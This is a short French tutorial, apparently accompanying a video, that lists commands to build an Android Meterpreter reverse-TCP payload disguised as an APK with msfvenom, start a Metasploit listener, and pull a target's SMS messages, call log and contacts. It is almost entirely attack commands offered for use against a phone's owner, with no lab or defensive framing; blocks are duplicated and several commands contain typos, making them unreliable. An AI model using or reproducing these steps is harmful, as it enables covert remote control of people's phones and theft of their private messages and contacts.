Vous trouverez une vidéo en bas de l'article
Les lignes de commandes utilisées dans la vidéo :
Création du payload
msfvenom -p android/meterpreter/reverse_tcp lhost=votre_adresse_ip lport=4444 >/root/Desktop/nom_du_payload.apk (n'oubliez pas l'extension.apk)
Metasploit
use exploits/multi/handler
set lhost votre_adresse_ipset lport 4444
set paylaod android/meterpreter/reverse_tcp
exploit
use exploits/multi/handler
set lhost votre_adresse_ipset lport 4444
set paylaod android/meterpreter/reverse_tcp
exploit
Les commandes Meterpreter
dump_sms cette ligne de commande est pour extraire les sms du téléphone de la cible dans un fichier texte
dump_calllog cette ligne de commande est pour extraire le log des appels entrant et sortant dans un fichier texte
dump_contacts cette ligne de commande vous permettra d'extraire les contacts de la cible dans un fichier texte
dump_sms cette ligne de commande est pour extraire les sms du téléphone de la cible dans un fichier texte
dump_calllog cette ligne de commande est pour extraire le log des appels entrant et sortant dans un fichier texte
dump_contacts cette ligne de commande vous permettra d'extraire les contacts de la cible dans un fichier texte